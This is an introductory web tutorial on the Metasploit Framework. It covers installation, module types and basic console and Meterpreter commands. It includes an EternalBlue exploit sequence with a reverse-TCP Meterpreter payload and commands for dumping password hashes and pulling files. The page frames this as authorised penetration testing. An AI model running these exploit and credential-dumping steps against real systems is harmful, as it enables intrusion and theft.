Metasploit Framework: Complete Guide

Metasploit Framework Interface

Metasploit Framework Console

Legal Disclaimer

Only use Metasploit Framework on systems you own or have explicit written permission to test. Unauthorized testing is illegal and may result in criminal charges.

Introduction to Metasploit Framework

Metasploit Framework is a powerful penetration testing tool that helps security professionals test system vulnerabilities, validate security controls, and perform security assessments.

Prerequisites
  • Basic understanding of networking concepts
  • Familiarity with Linux command line
  • Knowledge of security fundamentals
  • Testing environment (lab setup)

Installation Guide

Kali Linux (Pre-installed)

sudo apt update
sudo apt install metasploit-framework

Ubuntu/Debian Installation

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Database Setup

sudo systemctl start postgresql
sudo msfdb init

Basic Commands

msfconsole          # Start Metasploit console
help                # Show help menu
search [term]       # Search for modules
use [module]        # Select module
show options        # Display module options
set OPTION VALUE    # Set option value
exploit            # Run module
background         # Background session
sessions -l        # List sessions

Understanding Modules

Module Types:

  • Exploits: Code that takes advantage of vulnerabilities
  • Payloads: Code that runs after successful exploitation
  • Auxiliaries: Scanning and verification modules
  • Post: Post-exploitation modules
  • Encoders: Payload encoding tools
Module Usage Example:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

Meterpreter Basics

Common Commands:

sysinfo            # System information
getuid             # Current user
hashdump           # Dump password hashes
screenshot         # Take screenshot
download file      # Download file
upload file        # Upload file
shell              # Get system shell
migrate PID        # Migrate to process

Best Practices

  • Always use in controlled testing environments
  • Keep framework and modules updated
  • Document all testing activities
  • Use proper evasion techniques
  • Clean up after testing

Read Next

Penetration Testing
Penetration Testing

Complete guide to penetration testing methodology.

Read More
Nmap Tutorial
Nmap Tutorial

Network mapping and port scanning guide.

Read More
Burp Suite Guide
Burp Suite Guide

Web application security testing with Burp Suite.

Read More
Quick Links
Related Articles
Subscribe to Our Newsletter

Get the latest updates and exclusive content delivered to your inbox!